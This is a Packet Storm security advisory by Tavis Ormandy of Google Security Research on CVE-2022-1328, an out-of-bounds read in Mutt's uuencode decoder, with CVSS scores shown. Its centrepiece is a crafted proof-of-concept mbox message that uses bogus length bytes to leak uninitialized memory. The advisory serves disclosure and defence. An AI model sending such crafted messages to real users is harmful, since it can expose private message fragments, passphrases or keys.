Lucene search

K
packetstormTavis Ormandy, Google Security ResearchPACKETSTORM:167717
HistoryJul 11, 2022 - 12:00 a.m.

Mutt mutt_decode_uuencoded() Memory Disclosure

2022-07-1100:00:00
Tavis Ormandy, Google Security Research
packetstormsecurity.com
245

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

`mutt: mutt_decode_uuencoded() can read the past the of the input line  
  
In mutt_decode_uuencoded(), the line length is read from the untrusted uuencoded part without validation. This could result in including private memory in replys, for example fragments of other messages, passphrases or keys.  
  
Reproduce with the following mbox, note that these are literal 0x9f bytes. This should show some uninitialized garbage in the message.  
  
From taviso Thu Mar 31 16:53:55 2022  
From: taviso  
Subject: mutt_decode_uuencoded test  
Content-Disposition: inline  
Content-Transfer-Encoding: x-uuencode  
Content-Type: text/plain  
  
begin 644 test  
<9f>  
M2&5L;&\\L\"@I)9B!Y;W4@87)E(')E861I;F<@=&AI<R!M97-S86=E(&EN(&UU  
M='0L('1H92!N97AT(&QI;F4*<VAO=6QD(&-O;G1A:6X@9V%R8F%G92X*\"@H*  
<9f>  
54&QE87-E(')E<&QY+`I4879I<RX*  
`  
end.  
  
  
  
This bug is subject to a 90-day disclosure deadline. If a fix for this  
issue is made available to users before the end of the 90-day deadline,  
this bug report will become public 30 days after the fix was made  
available. Otherwise, this bug report will become public at the deadline.  
The scheduled deadline is YYYY-MM-DD.  
  
  
Related CVE Numbers: CVE-2022-1328.  
  
  
  
Found by: [email protected]  
  
`

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

Related for PACKETSTORM:167717